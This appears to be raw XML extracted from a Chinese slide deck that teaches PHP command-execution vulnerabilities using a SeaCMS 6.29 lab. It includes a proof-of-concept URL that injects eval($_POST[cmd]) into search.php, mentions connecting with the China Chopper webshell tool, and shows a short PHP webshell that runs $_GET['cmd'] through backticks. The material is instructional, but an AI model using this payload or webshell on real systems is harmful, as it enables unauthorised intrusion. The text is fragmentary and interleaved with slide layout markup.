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命令执行漏洞利用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命令执行漏洞案例演示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34493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利用菜刀连接 命令执行的位置。（也被称为代码执行）</a:t>
            </a:r>
            <a:endParaRPr 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POC: 	/search.php?searchtype=5&amp;tid=&amp;area=eval($_POST[cmd])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603500"/>
            <a:ext cx="10825480" cy="3084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4442460" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="44424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428172" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="442817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85826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PHP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下命令执行补充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61378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 eval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4749800" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="47498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命令执行实验环境搭建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命令执行漏洞案例演示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4442460" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="44424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428172" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="442817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85826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PHP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下命令执行补充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61378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 eval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4749800" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="47498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命令执行实验环境搭建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命令执行漏洞案例演示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下命令执行补充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下命令执行补充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中，除了函数可以执行系统命令。反引号 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>也可以作为系统命令执行来使用。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635" y="2136775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&lt;?php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echo "&lt;pre&gt;";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	if(isset($_GET["cmd"])){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    $cmd = $_GET["cmd"];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    echo `$cmd`;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}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echo "&lt;/pre&gt;";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?&gt;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5480" y="1772285"/>
            <a:ext cx="6096000" cy="461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 eval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 eval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eval() 函数把字符串按照 PHP 代码来计算。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该字符串必须是合法的 PHP 代码，且必须以分号结尾。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如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false。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3487420"/>
            <a:ext cx="9664065" cy="2275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68395" y="3081655"/>
            <a:ext cx="48552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命令执行实验环境搭建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命令执行实验环境搭建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下载海洋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cms 6.29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>作为演示实验代码。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5" y="1769745"/>
            <a:ext cx="8142605" cy="4549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命令执行漏洞案例演示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WPS 演示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PHP下命令执行补充</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PHP eval函数介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>命令执行实验环境搭建</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>命令执行漏洞案例演示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125</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-07T00:18:49Z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